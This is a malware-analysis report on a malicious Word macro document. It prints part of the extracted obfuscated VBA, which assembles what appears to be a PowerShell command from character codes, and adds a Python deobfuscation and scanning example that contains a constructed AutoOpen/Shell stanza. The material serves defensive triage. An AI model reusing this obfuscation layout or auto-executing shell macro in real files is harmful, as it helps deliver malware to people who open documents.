Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e888c8a6f8384f09…

MALICIOUS

Office (OLE)

Size: 225.2 KB
Created: 2018-06-28 22:47:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: c0cc9873dc50038ddda74a212ffbe38b
SHA-1: 03f595ed9062933fc7c908e0b33a67218178d542
SHA-256: e888c8a6f8384f0987a15741f5a865d4beccb38e460a6d1626ca1972a2656df0
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word (OLE) document carrying a VBA project. Two heuristics combine to make it critical: a Shell() call in the VBA and an AutoOpen entry point, so the macro runs as soon as the document is opened once macros are enabled. The p-code auto-exec heuristic fires on the compiled stream as well, so the verdict does not depend on the decompiled source surviving. The extracted macros.bas preview shows a familiar obfuscation layout: decoy arithmetic and ChrB() lines under On Error Resume Next, interleaved with short string literals that are concatenated to build one long string. The visible fragments ("HELL", "-Jo" + "in ", Chr(40), long comma-separated numeric lists) are consistent with a PowerShell command being assembled from a list of character codes at runtime, but the final command line is not recoverable from the truncated preview. A download-and-execute second stage is the likely purpose; that is an inference from the pattern, not something this static result confirms, so a sandbox run or macro emulation is needed to recover the command line and any contacted host. The single extracted URL is the DrawingML schema namespace and carries no indicator value. The legacy WordBasic marker is most likely the same AutoOpen name matched by a second, older-format check; its generic description (no VBA project recovered) is contradicted by the macros.bas artifact below and should not be read as evidence of a separate WordBasic payload.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace URI that Office writes into embedded drawing parts; it is not a host the macro contacts and should not be treated as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11381 bytes
SHA-256: 5e3fe7075460df14415f53d11975c51dc3d8ee23c6176997eb9f1757bfb9c379
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "wfZPivt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OMKIwzjciFilXj"
Function GOriAPK()
On Error Resume Next
pICiJO = 31770 + Atn(19988) / 8192 / Round(32823) / 23006 / CInt(JOMBz)
TDalMV = ChrB(48871 + Sin(CsvCo * CLng(jHwLJz + 47351) + 4211 + fYDGf))
iGdEbEK = "HELL" + "      " + "       " + "     " + "         " + "     " + "     " + "     -Jo" + "in " + Chr(40) + " " + Chr(40) + "126" + ", 12,5"
nZRZBd = 52982 + Atn(10495) / 8241 / Round(91803) / 63190 / CInt(mLYOB)
RrBPAr = ChrB(950 + Sin(RsvMI * CLng(uaOTi + 55597) + 75084 + FCuQc))
wIjUalb = "3, 31 " + ", 103 ," + "52 ,63" + " ,45 " + ",119,53,5" + "6 ,48,63" + ", 57" + " , 46, 12"
mqnQXb = 79174 + Atn(76819) / 89479 / Round(46744) / 46997 / CInt(ZqMjK)
mSOLwF = ChrB(69365 + Sin(pBmzV * CLng(PKYaFi + 78628) + 63922 + GjquE))
jvtzZUkpDGB = "2, 20," + " 63 " + ", 46 , " + "116, 13," + "63 , 56 ," + " 25 , " + "54 , 51 " + ", 63,52" + " ,46,"
wDVsC = 56311 + Atn(19470) / 53073 / Round(50875) / 88807 / CInt(jzmnBu)
nKPSm = ChrB(57816 + Sin(CFsIfF * CLng(fVtzQ + 14543) + 37074 + FiwjW))
MTrvGHHUzCI = " 97, 126" + " , 0,25" + " , 29," + "103 ,125" + ",50, " + "46, 46, 4"
pulEln = 13180 + Atn(88777) / 76847 / Round(57240) / 32872 / CInt(MzXRSv)
XBitpk = ChrB(75756 + Sin(jFhUGH * CLng(NKHEuS + 6960) + 71786 + PjYvTj))
ZdilTh = "2 ,9" + "6 , 11" + "7 ,11" + "7,45 ,45," + "45 ,1" + "16,5"
PDrzwL = 3340 + Atn(92106) / 37685 / Round(95995) / 8366 / CInt(pGJKkd)
MJOAWU = ChrB(30869 + Sin(dIMrPw * CLng(RQOHm + 2780) + 17476 + kwNdw))
diGUUO = "6, 40 ,5" + "9 , 57 ,6" + "3 , 41,11" + "6,53,40" + ", 61,116," + "47, 49 ," + "117 " + ", 32" + ",10 , " + "35 ,18," + " 104 ,41"
FWoRhX = 58103 + Atn(1869) / 4371 / Round(42022) / 59866 / CInt(OXmHGo)
Xpswcr = ChrB(70588 + Sin(wiEIq * CLng(WYmYZ + 64826) + 48713 + QOscGm))
NjHGtjWErLz = " , 10" + "7, 42" + ", 2 " + ",49,117" + " ,26,5" + "0 , 46" + ", 46 ," + "42 , " + "96 , 1" + "17 ,1"
GOriAPK = iGdEbEK + wIjUalb + jvtzZUkpDGB + MTrvGHHUzCI + ZdilTh + diGUUO + NjHGtjWErLz
YdqYzY = 70411 + Atn(24924) / 49048 / Round(21946) / 51808 / CInt(TfWzNo)
rzAjj = ChrB(13688 + Sin(lZiEz * CLng(wSaAOj + 84476) + 90999 + LNMwkF))
End Function
Function rTLaQZYPjN()
On Error Resume Next
tRiou = 89996 + Atn(71852) / 46816 / Round(87961) / 19426 / CInt(unLiV)
qzBFW = ChrB(67356 + Sin(wQFomW * CLng(WwdfNZ + 21832) + 81252 + hBHER))
QznmGO = "17 , 45, " + "45 , 4" + "5 ,1" + "16,46," + " 50, 51," + " 52 ," + "61 , 35 " + ", 59 " + ",42 , 42"
HacrBI = 72106 + Atn(9220) / 2773 / Round(45039) / 65517 / CInt(sdpwl)
dvvJf = ChrB(42028 + Sin(AAvTDO * CLng(MwIiMu + 41688) + 47157 + ucIiYS))
ZBTjBPPqilV = " ,116,57" + ",53, 55," + " 117,46,6" + "3 ,41,46" + ",117 , " + "21, " + "31 ,99 ," + "43 ," + " 34 " + ", 110 , "
OkQkb = 42723 + Atn(4047) / 97229 / Round(89872) / 12393 / CInt(BIpkzI)
otUKk = ChrB(82540 + Sin(EKBjX * CLng(Yhnhjn + 59151) + 6104 + wKkFzU))
tEpKCQzYiAf = "52 , 52 " + ", 57 ,1" + "17,26 ,50" + ", 46" + ", 46, 42 " + ", 96," + "117,117" + " , 45" + ",45 , " + "45,116," + " 62 ,63, "
vJfzb = 69545 + Atn(48350) / 85753 / Round(7566) / 95 / CInt(iWLAR)
PXTVH = ChrB(2583 + Sin(dAzzJ * CLng(irjoO + 84903) + 3642 + PnIud))
EFjHjal = "34,46,63 " + ", 40 , 5" + "5,59, 57" + " , 49,116" + " , 57 , 5" + "3, 55 " + ", 117, 2" + "3, 63"
Ovjivs = 25614 + Atn(81518) / 52945 / Round(1263) / 90374 / CInt(HVWbmb)
iVhCiz = ChrB(16497 + Sin(wAjLa * CLng(RuhUTB + 33013) + 24219 + Qftbkj))
WARXjskbEE = ", 62 " + ",51, 5" + "9, 117" + ", 56 ,30" + " , 43,5" + "6 ,18 , 2" + "1 , " + "22,11" + "7, 26 "
oBjLz = 26678 + Atn(64346) / 87319 / Round(95535) / 64327 / CInt(dOqroU)
qaoHT = ChrB(50870 + Sin(RhRWp * CLng(YjwLi + 61164) + 27870 + DNoWlO))
DittBXS = ",50 , " + "46 ,46" + ", 42 , 9" + "6,117 " + ", 117 " + ",45 , " + "45 , 45 " + ", 116, 5" + "9, 55 , 5" + "6,59,4" + "1 , 4
... (truncated)
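The preview above stops before the string is used, but the obfuscation it shows (fragmented literals joined with +, Chr() calls, decoy arithmetic under On Error Resume Next) can be collapsed statically. The Python below is an added worked example, not part of this report and not the oletools code the report cites. It runs on a constructed VBA fragment modelled on GOriAPK(); the AutoOpen/Shell stanza in that fragment is constructed to mirror what the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics report and is not visible in the truncated preview. The function names (eval_concat, recover_strings, scan_markers) and the marker lists are the example's own choices.

```python
import re
from typing import Dict, List, Optional

# Constructed sample, modelled on the GOriAPK() fragment in the macros.bas
# preview above. The AutoOpen/Shell stanza is constructed to mirror what the
# OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics report; it is not visible in
# the truncated preview and is not a claim about the real macro's structure.
SAMPLE_VBA = '''Attribute VB_Name = "OMKIwzjciFilXj"
Function GOriAPK()
On Error Resume Next
pICiJO = 31770 + Atn(19988) / 8192 / Round(32823) / 23006 / CInt(JOMBz)
TDalMV = ChrB(48871 + Sin(CsvCo * CLng(jHwLJz + 47351) + 4211 + fYDGf))
iGdEbEK = "HELL" + "      " + "     -Jo" + "in " + Chr(40) + " " + Chr(40) + "126" + ", 12,5"
wIjUalb = "3, 31 " + ", 103 ," + "52 ,63"
GOriAPK = iGdEbEK + wIjUalb
End Function
Sub AutoOpen()
Shell GOriAPK(), vbHide
End Sub
'''

# Entry points Office runs without user interaction (Word and Excel names).
AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose",
            "document_open", "document_close", "workbook_open"}
# Execution primitives, matched as bare tokens; a string literal containing
# the word also fires, which is acceptable for a triage heuristic.
EXEC_CALLS = re.compile(r"\b(Shell|CreateObject|GetObject|WScript\.Shell)\b", re.I)
PROC_DEF = re.compile(r"\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
# One token of a right-hand side: "literal", Chr(n), identifier, '+', or anything else.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|([A-Za-z_]\w*)|(\+)|(\S)')


def eval_concat(expr: str, env: Dict[str, str]) -> Optional[str]:
    """Evaluate a right-hand side made only of "..." literals, Chr(n) calls and
    already-resolved variables joined by '+'. Anything else (arithmetic, other
    calls such as ChrB/CLng, unknown names) returns None, so decoy lines are ignored."""
    parts: List[str] = []
    for lit, chrn, ident, plus, other in TOKEN.findall(expr):
        if plus:
            continue
        if other:
            return None
        if chrn:
            parts.append(chr(int(chrn)))
        elif ident:
            if ident not in env:
                return None
            parts.append(env[ident])
        else:
            parts.append(lit.replace('""', '"'))  # VBA escapes a quote as ""
    return "".join(parts) if parts else None


def recover_strings(vba: str) -> Dict[str, str]:
    """Resolve every pure-concatenation assignment top to bottom, so a function
    whose return value joins earlier variables yields the assembled string."""
    env: Dict[str, str] = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if m:
            val = eval_concat(m.group(2), env)
            if val is not None:
                env[m.group(1)] = val
    return env


def scan_markers(vba: str) -> List[str]:
    """Flag auto-exec entry points and execution primitives, the two signals
    that OLE_VBA_AUTOOPEN and OLE_VBA_SHELL combine into a critical verdict."""
    findings: List[str] = []
    for no, line in enumerate(vba.splitlines(), 1):
        m = PROC_DEF.match(line)
        if m and m.group(1).lower() in AUTOEXEC:
            findings.append(f"line {no}: auto-exec entry point {m.group(1)}")
        m = EXEC_CALLS.search(line)
        if m:
            findings.append(f"line {no}: execution primitive {m.group(1)}")
    return findings


if __name__ == "__main__":
    for finding in scan_markers(SAMPLE_VBA):
        print(finding)
    strings = recover_strings(SAMPLE_VBA)
    print("GOriAPK() returns:", repr(strings["GOriAPK"]))
```

Pointed at the real macros.bas instead of the constructed sample, recover_strings() yields the full numeric list that GOriAPK() and its sibling functions return; the decoy pICiJO/TDalMV style lines never resolve and drop out. Converting that list into the command line needs the decode step (key, operator) that sits after the truncated preview, so the recovered string is a lead for emulation, not a finished indicator.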